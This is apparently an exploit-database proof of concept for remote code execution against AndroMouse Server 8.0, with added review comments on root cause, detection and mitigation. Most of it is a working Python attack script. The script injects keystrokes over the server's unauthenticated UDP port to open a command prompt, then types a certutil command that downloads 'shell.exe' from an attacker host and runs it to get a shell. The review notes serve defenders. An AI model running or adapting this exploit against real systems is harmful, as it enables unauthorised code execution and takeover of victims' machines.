# Exploit Title: AndroMouse Server 8.0 - Remote Code Execution
# Date: 03/07/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://andromouse.com
# Software Link: https://andromouse-server.en.lo4d.com/windows
# Version: 8.0
# Tested on: Windows 10

'''
Description:
Exploits AndroMouse Server 8.0's unauthenticated UDP interface to simulate
mouse/keyboard actions and execute malicious commands via certutil.
'''

# NOTE(review): root cause, per the description above, is that the server
# accepts input-injection messages over UDP without authenticating the
# sender, so any host that can reach the listening port can drive the
# logged-on user's desktop.
#
# NOTE(review): detection. Look for inbound UDP to the AndroMouse port
# (8888 in this PoC) from hosts that are not the paired phone, and for
# cmd.exe spawning certutil.exe with "-urlcache -f" and an http:// URL,
# followed by execution of the file it wrote to the working directory
# (ingress tool transfer, MITRE ATT&CK T1105).
#
# NOTE(review): mitigation. Remove the server where it is not needed,
# or restrict the UDP port with a host firewall rule to the single trusted
# device. Application control that stops certutil.exe from making outbound
# requests blunts the download step but does not fix the unauthenticated
# input channel.

import socket
import time

# Lab values from the author's test setup (private RFC 1918 addresses).
TARGET_IP = "192.168.8.104"   # host running AndroMouse Server
TARGET_PORT = 8888            # UDP port the server is reached on in this PoC
LHOST = "192.168.8.103"       # HTTP host the certutil command fetches from
PAYLOAD = "shell.exe"         # file name requested from LHOST and then run


def send_udp(message, delay=0.3):
    """Send one protocol message as a single UDP datagram, then pause.

    message -- text command in the server's "name|arg|..." form.
    delay   -- seconds to sleep after sending, so the remote UI can keep up.

    No reply is read: the protocol as used here is fire-and-forget.
    """
    datagram = message.encode()
    destination = (TARGET_IP, TARGET_PORT)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(datagram, destination)
        time.sleep(delay)


print("[*] Positioning mouse...")
# Presumably pins the pointer to the bottom-left screen corner, nudges it
# onto the Start button and clicks it; confirm against the target layout.
for mouse_step in ("mouse_move|-9999|9999", "mouse_move|15|-10", "mouse_click|0"):
    send_udp(mouse_step, 0.5)

print("[*] Opening CMD...")
# Keystrokes are injected one character per datagram.
for key in "cmd":
    send_udp(f"keyboard_char|{key}")
# "\x0a" (line feed) is sent as a character; it appears to act as Enter.
# The longer pause gives the console window time to open.
send_udp("keyboard_char|\x0a", 2)

print(f"[*] Executing payload from {LHOST}...")
# The typed command downloads PAYLOAD with certutil and runs it; this is
# the command line defenders should alert on.
command_line = f"certutil -urlcache -f http://{LHOST}/{PAYLOAD} {PAYLOAD} && {PAYLOAD}"
for key in command_line:
    send_udp(f"keyboard_char|{key}")
send_udp("keyboard_char|\x0a")

print("[+] Payload execution complete - check your listener!")